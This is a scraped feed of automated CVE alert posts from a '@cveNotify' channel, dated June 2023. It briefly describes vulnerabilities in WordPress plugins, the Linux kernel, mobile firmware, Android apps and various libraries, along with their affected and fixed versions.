🚨 CVE-2023-3192Session Fixation in GitHub repository froxlor/froxlor prior to 2.1.0.🎖@cveNotify |
|
| 2023-06-11 05:58:18 |
🚨 CVE-2023-3079Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-11 05:58:17 |
🚨 CVE-2022-39335Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. The Matrix Federation API allows remote homeservers to request the authorization events in a room. This is necessary so that a homeserver receiving some events can validate that those events are legitimate and permitted in their room. However, in versions of Synapse up to and including 1.68.0, a Synapse homeserver answering a query for authorization events does not sufficiently check that the requesting server should be able to access them. The issue was patched in Synapse 1.69.0. Homeserver administrators are advised to upgrade.🎖@cveNotify |
|
| 2023-06-11 05:58:16 |
🚨 CVE-2021-32850jQuery MiniColors is a color picker built on jQuery. Prior to version 2.3.6, jQuery MiniColors is prone to cross-site scripting when handling untrusted color names. This issue is patched in version 2.3.6.🎖@cveNotify |
|
| 2023-06-10 11:58:18 |
🚨 CVE-2023-3190Improper Encoding or Escaping of Output in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-10 11:58:17 |
🚨 CVE-2023-3191Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-10 11:58:16 |
🚨 CVE-2023-26132Versions of the package dottie before 2.0.4 are vulnerable to Prototype Pollution due to insufficient checks, via the set() function and the current variable in the /dottie.js file.🎖@cveNotify |
|
| 2023-06-10 05:58:40 |
🚨 CVE-2023-21656Memory corruption in WLAN HOST while receiving an WMI event from firmware.🎖@cveNotify |
|
| 2023-06-10 05:58:39 |
🚨 CVE-2023-21657Memoru corruption in Audio when ADSP sends input during record use case.🎖@cveNotify |
|
| 2023-06-10 05:58:38 |
🚨 CVE-2023-21658Transient DOS in WLAN Firmware while processing the received beacon or probe response frame.🎖@cveNotify |
|
| 2023-06-10 05:58:37 |
🚨 CVE-2023-21659Transient DOS in WLAN Firmware while processing frames with missing header fields.🎖@cveNotify |
|
| 2023-06-10 05:58:36 |
🚨 CVE-2023-21660Transient DOS in WLAN Firmware while parsing FT Information Elements.🎖@cveNotify |
|
| 2023-06-10 05:58:34 |
🚨 CVE-2022-40533Transient DOS due to untrusted Pointer Dereference in core while sending USB QMI request.🎖@cveNotify |
|
| 2023-06-10 05:58:33 |
🚨 CVE-2022-40536Transient DOS due to improper authentication in modem while receiving plain TLB OTA request message from network.🎖@cveNotify |
|
| 2023-06-10 05:58:32 |
🚨 CVE-2022-40522Memory corruption in Linux Networking due to double free while handling a hyp-assign.🎖@cveNotify |
|
| 2023-06-10 05:58:31 |
🚨 CVE-2022-40523Information disclosure in Kernel due to indirect branch misprediction.🎖@cveNotify |
|
| 2023-06-10 05:58:30 |
🚨 CVE-2022-40525Information disclosure in Linux Networking Firmware due to unauthorized information leak during side channel analysis.🎖@cveNotify |
|
| 2023-06-10 05:58:29 |
🚨 CVE-2022-40529Memory corruption due to improper access control in kernel while processing a mapping request from root process.🎖@cveNotify |
|
| 2023-06-10 05:58:28 |
🚨 CVE-2023-30865In dialer service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-06-10 05:58:26 |
🚨 CVE-2023-30866In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-06-10 05:58:25 |
🚨 CVE-2023-30914In email service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-06-10 05:58:24 |
🚨 CVE-2023-30915In email service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-06-10 05:58:20 |
🚨 CVE-2022-48448In telephony service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-06-10 05:58:19 |
🚨 CVE-2023-30864In Connectivity Service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-06-10 05:58:18 |
🚨 CVE-2023-30863In Connectivity Service, there is a possible missing permission check. This could lead to local escalation of privilege with no additional execution privileges.🎖@cveNotify |
|
| 2023-06-10 05:58:17 |
🚨 CVE-2022-48447In telephony service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-06-10 05:58:16 |
🚨 CVE-2022-48446In telephony service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.🎖@cveNotify |
|
| 2023-06-10 01:58:34 |
🚨 CVE-2023-22862IBM Aspera Connect 4.2.5 and IBM Aspera Cargo 4.2.5 transmits authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. IBM X-Force ID: 244107.🎖@cveNotify |
|
| 2023-06-10 01:58:30 |
🚨 CVE-2023-2489The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-10 01:58:29 |
🚨 CVE-2023-3111A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().🎖@cveNotify |
|
| 2023-06-10 01:58:28 |
🚨 CVE-2023-2488The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2023 does not sanitise and escape various parameters before outputting them back in admin dashboard pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-06-10 01:58:24 |
🚨 CVE-2022-47617Hitron CODA-5310 has hard-coded encryption/decryption keys in the program code. A remote attacker authenticated as an administrator can decrypt system files using the hard-coded keys for file access, modification, and cause service disruption.🎖@cveNotify |
|
| 2023-06-10 01:58:23 |
🚨 CVE-2023-33409Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php.🎖@cveNotify |
|
| 2023-06-10 01:58:22 |
🚨 CVE-2023-32766Gitpod before 2022.11.3 allows XSS because redirection can occur for some protocols outside of the trusted set of three (vscode: vscode-insiders: jetbrains-gateway:).🎖@cveNotify |
|
| 2023-06-10 01:58:18 |
🚨 CVE-2022-46308SGUDA U-Lock central lock control service’s user management function has incorrect authorization. A remote attacker with general user privilege can exploit this vulnerability to call privileged APIs to access, modify and delete user information.🎖@cveNotify |
|
| 2023-06-10 01:58:17 |
🚨 CVE-2023-3032Unrestricted Upload of File with Dangerous Type vulnerability in Mobatime web application (Documentary proof upload modules) allows a malicious user to Upload a Web Shell to a Web Server.This issue affects Mobatime web application: through 06.7.22.🎖@cveNotify |
|
| 2023-06-09 22:58:31 |
🚨 CVE-2023-3187A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.🎖@cveNotify |
|
| 2023-06-09 22:58:30 |
🚨 CVE-2023-29749An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.🎖@cveNotify |
|
| 2023-06-09 22:58:29 |
🚨 CVE-2023-29756An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.🎖@cveNotify |
|
| 2023-06-09 22:58:25 |
🚨 CVE-2023-29757An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.🎖@cveNotify |
|
| 2023-06-09 22:58:24 |
🚨 CVE-2023-29759An issue found in FlightAware v.5.8.0 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the database files.🎖@cveNotify |
|
| 2023-06-09 22:58:23 |
🚨 CVE-2023-29766An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause an escalation of Privileges via the database files.🎖@cveNotify |
|
| 2023-06-09 22:58:19 |
🚨 CVE-2023-29767An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause a persistent denial of service via the database files.🎖@cveNotify |
|
| 2023-06-09 22:58:18 |
🚨 CVE-2023-34856A Cross Site Scripting (XSS) vulnerability in D-Link DI-7500G-CI-19.05.29A allows attackers to execute arbitrary code via uploading a crafted HTML file to the interface /auth_pic.cgi.🎖@cveNotify |
|
| 2023-06-09 22:58:17 |
🚨 CVE-2023-27706Bitwarden Desktop v1.20.0 and above stores the biometric key in plaintext which allows a local attacker to decrypt the entire local vault.🎖@cveNotify |
|
| 2023-06-09 22:58:13 |
🚨 CVE-2023-29714Cross Site Scripting vulnerability found in Vade Secure Gateway allows a remote attacker to execute arbitrary code via the username, password, and language cookies parameter.🎖@cveNotify |
|
| 2023-06-09 22:58:12 |
🚨 CVE-2023-2455Row security policies disregard user ID changes after inlining; PostgreSQL could permit incorrect policies to be applied in certain cases where role-specific policies are used and a given query is planned under one role and then executed under other roles. This scenario can happen under security definer functions or when a common user and query is planned initially and then re-used across multiple SET ROLEs. Applying an incorrect policy may permit a user to complete otherwise-forbidden reads and modifications. This affects only databases that have used CREATE POLICY to define a row security policy.🎖@cveNotify |
|
| 2023-06-09 22:58:11 |
🚨 CVE-2022-39286Jupyter Core is a package for the core common functionality of Jupyter projects. Jupyter Core prior to version 4.11.2 contains an arbitrary code execution vulnerability in `jupyter_core` that stems from `jupyter_core` executing untrusted files in CWD. This vulnerability allows one user to run code as another. Version 4.11.2 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-09 20:58:15 |
🚨 CVE-2023-34100Contiki-NG is an open-source, cross-platform operating system for IoT devices. When reading the TCP MSS option value from an incoming packet, the Contiki-NG OS does not verify that certain buffer indices to read from are within the bounds of the IPv6 packet buffer, uip_buf. In particular, there is a 2-byte buffer read in the module os/net/ipv6/uip6.c. The buffer is indexed using 'UIP_IPTCPH_LEN + 2 + c' and 'UIP_IPTCPH_LEN + 3 + c', but the uip_buf buffer may not have enough data, resulting in a 2-byte read out of bounds. The problem has been patched in the "develop" branch of Contiki-NG, and is expected to be included in release 4.9. Users are advised to watch for the 4.9 release and to upgrade when it becomes available. There are no workarounds for this vulnerability aside from manually patching with the diff in commit `cde4e9839`.🎖@cveNotify |
|
| 2023-06-09 20:58:14 |
🚨 CVE-2019-16283A potential security vulnerability has been identified with a version of the HP Softpaq installer that can lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-06-09 18:58:29 |
🚨 CVE-2023-3052The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_add_post', 'azh_duplicate_post', 'azh_update_post' and 'azh_remove_post' functions. This makes it possible for unauthenticated attackers to create, modify, and delete a post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 18:58:27 |
🚨 CVE-2023-3051The Page Builder by AZEXO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'azh_post' shortcode in versions up to, and including, 1.27.133 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-09 18:58:26 |
🚨 CVE-2023-33731Reflected Cross Site Scripting (XSS) in the view dashboard detail feature in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the URL directly.🎖@cveNotify |
|
| 2023-06-09 18:58:25 |
🚨 CVE-2023-29746An issue found in The Thaiger v.1.2 for Android allows unauthorized apps to cause a code execution attack by manipulating the SharedPreference files.🎖@cveNotify |
|
| 2023-06-09 18:58:24 |
🚨 CVE-2023-29725The BT21 x BTS Wallpaper app 12 for Android allows unauthorized applications to actively request permission to insert data into the database that records information about a user's personal preferences and will be loaded into memory to be read and used when the application is opened. By injecting data, the attacker can force the application to load malicious image URLs and display them in the UI. As the amount of data increases, it will eventually cause the application to trigger an OOM error and crash, resulting in a persistent denial of service attack.🎖@cveNotify |
|
| 2023-06-09 18:58:23 |
🚨 CVE-2023-3055The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_save' function. This makes it possible for unauthenticated attackers to update the post content and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 18:58:21 |
🚨 CVE-2023-3053The Page Builder by AZEXO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'azh_add_post' function in versions up to, and including, 1.27.133. This makes it possible for authenticated attackers to create a post with any post type and post status.🎖@cveNotify |
|
| 2023-06-09 18:58:20 |
🚨 CVE-2023-28701ELITE TECHNOLOGY CORP. Web Fax has a vulnerability of SQL Injection. An unauthenticated remote attacker can inject SQL commands into the input field of the login page to perform arbitrary system commands, disrupt service or terminate service.🎖@cveNotify |
|
| 2023-06-09 18:58:19 |
🚨 CVE-2019-5786Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.🎖@cveNotify |
|
| 2023-06-09 16:58:18 |
🚨 CVE-2016-15032** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in mback2k mh_httpbl Extension up to 1.1.7 on TYPO3. This affects the function stopOutput of the file class.tx_mhhttpbl.php. The manipulation of the argument $_SERVER['REMOTE_ADDR'] leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.1.8 is able to address this issue. The name of the patch is a754bf306a433a8c18b55e25595593e8f19b9463. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230391. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-09 16:58:17 |
🚨 CVE-2023-3084Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-09 16:58:16 |
🚨 CVE-2023-2298The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to, and including, 4.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-09 16:58:15 |
🚨 CVE-2023-2299The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the /wp-json/vcita-wordpress/v1/actions/auth REST-API endpoint in versions up to, and including, 4.2.10 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings.🎖@cveNotify |
|
| 2023-06-09 15:58:30 |
🚨 CVE-2023-3086Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-09 15:58:29 |
🚨 CVE-2023-2300The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-09 15:58:28 |
🚨 CVE-2015-10110A vulnerability classified as problematic was found in ruddernation TinyChat Room Spy Plugin up to 1.2.8 on WordPress. This vulnerability affects the function wp_show_room_spy of the file room-spy.php. The manipulation of the argument room leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.9 is able to address this issue. The name of the patch is ab72627a963d61fb3bc31018e3855b08dc94a979. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230392.🎖@cveNotify |
|
| 2023-06-09 15:58:27 |
🚨 CVE-2023-2301The Contact Form Builder by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.9.1. This is due to missing nonce validation on the ls_parse_vcita_callback function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 15:58:26 |
🚨 CVE-2023-2302The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-09 15:58:24 |
🚨 CVE-2023-2303The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.4. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 15:58:23 |
🚨 CVE-2023-28043Dell SCG 5.14 contains an information disclosure vulnerability during the SRS to SCG upgrade path. A remote low privileged malicious user could potentially exploit this vulnerability to retrieve the plain text.🎖@cveNotify |
|
| 2023-06-09 15:58:22 |
🚨 CVE-2023-33965Brook is a cross-platform programmable network tool. The `tproxy` server is vulnerable to a drive-by command injection. An attacker may fool a victim into visiting a malicious web page which will trigger requests to the local `tproxy` service leading to remote code execution. A patch is available in version 20230606.🎖@cveNotify |
|
| 2023-06-09 15:58:21 |
🚨 CVE-2023-2261The WP Activity Log plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_ajax_call function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers, with subscriber-level access or higher, to obtain a list of users with accounts on the site. This includes ids, usernames and emails.🎖@cveNotify |
|
| 2023-06-09 15:58:20 |
🚨 CVE-2023-2284The WP Activity Log Premium plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_switch_db function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers with subscriber-level or higher to make changes to the plugin's settings.🎖@cveNotify |
|
| 2023-06-09 15:58:19 |
🚨 CVE-2023-2285The WP Activity Log Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_switch_db function. This makes it possible for unauthenticated attackers to make changes to the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 15:58:17 |
🚨 CVE-2023-2286The WP Activity Log for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_run_cleanup function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 15:58:16 |
🚨 CVE-2023-3183A vulnerability was found in SourceCodester Performance Indicator System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/addproduct.php. The manipulation of the argument prodname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231163.🎖@cveNotify |
|
| 2023-06-09 15:58:15 |
🚨 CVE-2023-3184A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=save. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-231164.🎖@cveNotify |
|
| 2023-06-09 15:58:14 |
🚨 CVE-2022-28739There is a buffer over-read in Ruby before 2.6.10, 2.7.x before 2.7.6, 3.x before 3.0.4, and 3.1.x before 3.1.2. It occurs in String-to-Float conversion, including Kernel#Float and String#to_f.🎖@cveNotify |
|
| 2023-06-09 13:58:23 |
🚨 CVE-2023-32731When gRPC HTTP2 stack raised a header size exceeded error, it skipped parsing the rest of the HPACK frame. This caused any HPACK table mutations to also be skipped, resulting in a desynchronization of HPACK tables between sender and receiver. If leveraged, say, between a proxy and a backend, this could lead to requests from the proxy being interpreted as containing headers from different proxy clients - leading to an information leak that can be used for privilege escalation or data exfiltration. We recommend upgrading beyond the commit contained in https://github.com/grpc/grpc/pull/32309 https://github.com/grpc/grpc/pull/32309 🎖@cveNotify |
|
| 2023-06-09 13:58:22 |
🚨 CVE-2023-32732gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url 🎖@cveNotify |
|
| 2023-06-09 10:58:44 |
🚨 CVE-2023-2235A use-after-free vulnerability in the Linux Kernel Performance Events system can be exploited to achieve local privilege escalation.The perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability.We recommend upgrading past commit fd0815f632c24878e325821943edccc7fde947a2.🎖@cveNotify |
|
| 2023-06-09 10:58:43 |
🚨 CVE-2023-31436qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.🎖@cveNotify |
|
| 2023-06-09 10:58:42 |
🚨 CVE-2023-1387Grafana is an open-source platform for monitoring and observability. Starting with the 9.1 branch, Grafana introduced the ability to search for a JWT in the URL query parameter auth_token and use it as the authentication token. By enabling the "url_login" configuration option (disabled by default), a JWT might be sent to data sources. If an attacker has access to the data source, the leaked token could be used to authenticate to Grafana.🎖@cveNotify |
|
| 2023-06-09 10:58:41 |
🚨 CVE-2023-2006A race condition was found in the Linux kernel's RxRPC network protocol, within the processing of RxRPC bundles. This issue results from the lack of proper locking when performing operations on an object. This may allow an attacker to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-06-09 10:58:40 |
🚨 CVE-2023-2176A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.🎖@cveNotify |
|
| 2023-06-09 10:58:36 |
🚨 CVE-2023-2892The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_delete_product function. This makes it possible for unauthenticated attackers to bulk delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 10:58:35 |
🚨 CVE-2023-2894The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_deactivate_product function. This makes it possible for unauthenticated attackers to bulk deactivate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 10:58:34 |
🚨 CVE-2023-2896The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_duplicate_product function. This makes it possible for unauthenticated attackers to duplicate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-09 10:58:30 |
🚨 CVE-2023-2897The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an 'X-Forwarded-For' HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the 'X-Forwarded-For' header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.🎖@cveNotify |
|
| 2023-06-09 10:58:29 |
🚨 CVE-2023-34364A buffer overflow was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. An overly large value for certain options of a connection string may overrun the buffer allocated to process the string value. This allows an attacker to execute code of their choice on an affected host by copying carefully selected data that will be executed as code.🎖@cveNotify |
|
| 2023-06-09 10:58:28 |
🚨 CVE-2023-2189The Elementor Addons, Widgets and Enhancements – Stax plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the toggle_widget function in versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable Elementor widgets.🎖@cveNotify |
|
| 2023-06-09 10:58:24 |
🚨 CVE-2023-2031The Locatoraid Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-09 10:58:23 |
🚨 CVE-2023-2085The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the templates function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin template information. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.🎖@cveNotify |
|
| 2023-06-09 10:58:22 |
🚨 CVE-2023-2159The CMP – Coming Soon & Maintenance plugin for WordPress is vulnerable to Maintenance Mode Bypass in versions up to, and including, 4.1.7. A correct cmp_bypass GET parameter in the URL (equal to the md5-hashed home_url in the default setting) allows users to visit a site placed in maintenance mode thus bypassing the plugin's provided feature.🎖@cveNotify |
|
| 2023-06-09 05:58:35 |
🚨 CVE-2023-20715In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07796900; Issue ID: ALPS07796900.🎖@cveNotify |
|
| 2023-06-09 05:58:34 |
🚨 CVE-2023-20716In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07796883; Issue ID: ALPS07796883.🎖@cveNotify |
|
| 2023-06-09 05:58:33 |
🚨 CVE-2023-20728In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573603; Issue ID: ALPS07573603.🎖@cveNotify |
|
| 2023-06-09 00:58:14 |
🚨 CVE-2023-34243TGstation is a toolset to manage production BYOND servers. In affected versions if a Windows user was registered in tgstation-server (TGS), an attacker could discover their username by brute-forcing the login endpoint with an invalid password. When a valid Windows logon was found, a distinct response would be generated. This issue has been addressed in version 5.12.5. Users are advised to upgrade. Users unable to upgrade may be mitigated by rate-limiting API calls with software that sits in front of TGS in the HTTP pipeline such as fail2ban.🎖@cveNotify |
|
| 2023-06-08 20:58:18 |
🚨 CVE-2023-22652A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in openSUSE libeconf leads to DoS via malformed config files.This issue affects libeconf: before 0.5.2.🎖@cveNotify |
|
| 2023-06-08 20:58:17 |
🚨 CVE-2023-32181A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in openSUSE libeconf allows for DoS via malformed configuration filesThis issue affects libeconf: before 0.5.2.🎖@cveNotify |
|
| 2023-06-08 20:58:16 |
🚨 CVE-2015-10109A vulnerability was found in Video Playlist and Gallery Plugin up to 1.136 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the file wp-media-cincopa.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.137 is able to address this issue. The name of the patch is ee28e91f4d5404905204c43b7b84a8ffecad932e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230264.🎖@cveNotify |
|
| 2023-06-08 20:58:15 |
🚨 CVE-2019-16942A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.🎖@cveNotify |
|
| 2023-06-08 20:58:14 |
🚨 CVE-2017-17485FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.🎖@cveNotify |
|
| 2023-06-08 17:58:21 |
🚨 CVE-2023-31226The SDK for the MediaPlaybackController module has improper permission verification. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-06-08 14:58:19 |
🚨 CVE-2023-33719mp4v2 v2.1.3 was discovered to contain a memory leak via MP4SdpAtom::Read() at atom_sdp.cpp🎖@cveNotify |
|
| 2023-06-08 14:58:17 |
🚨 CVE-2023-33716mp4v2 v2.1.3 was discovered to contain a memory leak via the class MP4StringProperty at mp4property.cpp.🎖@cveNotify |
|
| 2023-06-08 14:58:16 |
🚨 CVE-2023-33658A heap buffer overflow vulnerability exists in NanoMQ 0.17.2. The vulnerability can be triggered by calling the function nni_msg_get_pub_pid() in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack.🎖@cveNotify |
|
| 2023-06-08 14:58:15 |
